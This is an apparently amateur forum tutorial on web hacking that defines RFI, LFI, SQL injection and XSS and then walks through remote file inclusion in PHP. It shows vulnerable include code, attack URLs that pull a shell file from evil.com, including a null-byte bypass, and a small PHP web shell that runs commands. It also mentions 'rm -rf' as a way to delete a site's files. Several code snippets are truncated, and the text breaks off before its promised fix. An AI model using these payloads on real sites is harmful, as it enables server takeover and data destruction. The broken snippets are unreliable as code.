-= WebHacking

-= Intro

in this tutorial, we will discuss the vulnerabilities, and what goes wrong with the developer, and some ways to exploit them...


Tutorial: [ Basic || 1 ]

| || Starter ||

Things to know:

=- Vulnerability : a security hole, can be exploited to change the way the webapp / software works / functions.

=- CMS's, Forums uses DataBases to store the info like users, posts, threads, messages and so on, its usually / mostly a MySQL server.

=- RFI [ Remote File Inclusion ] : a malicious user can include a 'bad' code to be executed on the vulnerable site.

=- LFI [ Local File Inclusion ] : a malicious user can open any file on the server.

=- SQL Injection : Injecting a MySQL query to bypass or get more info from a DataBase.

=- XSS [ Cross Site Scripting ] : if it was a permanent vulnerability, where the users input is saved, the user can log cookies, IP, and much more...

=- Exploit : a script made to maliciously use a vulnerability.

| || What goes wrong ||

We are going to take each vulnerability, and take alook at what goes wrong with the web developer, that made the script vulnerable...

=- RFI ::

RFI's are exploited by including a 'bad' code from another site, to the infected site, for example you can include a PHP-Shell, and execute command on the server using it...

this vulnerability is very dangerous, a site infected with it can be compromised easily...

an example of a code infected with a RFI:


$page = $_GET[&#39;page&#39;]; 

if (isset($page)) 

as you can see, we are taking the variable page, and including it, now that script will work great and do what it&#39;s supposed to do, for example:


this would open contact.dmz, BUT, what would a malicious user do?

http://www.example.com/index.dmz?pag.../www.evil.com/ shell.txt?

the shell code must be in a txt file, because this way the code will be parsed / executed on the vulnerable site.

what happens then?


$page = $_GET[&#39;page&#39;]; 

if (isset($page)) 

that text file gets included, so lets say the shell.txt had the following


$command = $_GET[&#39;cmd&#39;]; 

if ($command) 
echo " 
<form method=&#39;GET&#39;> 
<input type=&#39;text&#39; name=&#39;cmd&#39;> 
<input type=&#39;submit&#39; name=&#39;submit&#39; value=&#39;Go!&#39;> 

a small text box would appear on the page, with a button, that would execute commands... the user can compromise the full site using this simple text box, if he had enough privs, he can do the following:

rm -rf

and delete your files...

some devs, think they can fix the vulnerability by doing the followin


$page = $_GET[&#39;page&#39;]; 
$page = $page . ".php"; 

if (isset($page)) 

this way, you can only include .php files, and that is not really a big deal cause PHP gets parsed on the server side...

but, that wont stop some people, there is something called a NullByte, that would simply tell PHP to ignore anything after it... if someone wanted to exploit that code, he would do:

http://www.darkmindz.com/index.dmz?p...p://www.evil.c om/shell.txt?%00

as you can see, the [ %00 ] is the NullByte, that would get parsed this way:


$page = $_GET[&#39;page&#39;]; 
$page = $page . ".php"; 

if (isset($page)) 
include(&#39;http://www.evil.com/shell.txt?&#39;); // ignoring anything after the NullByte, which is in this case, the .php... 

so the question now, is how to completely secure this URL system?!

well, you can use a switch statement, and this way, anything other than what is already stated, wont be included.. ex:

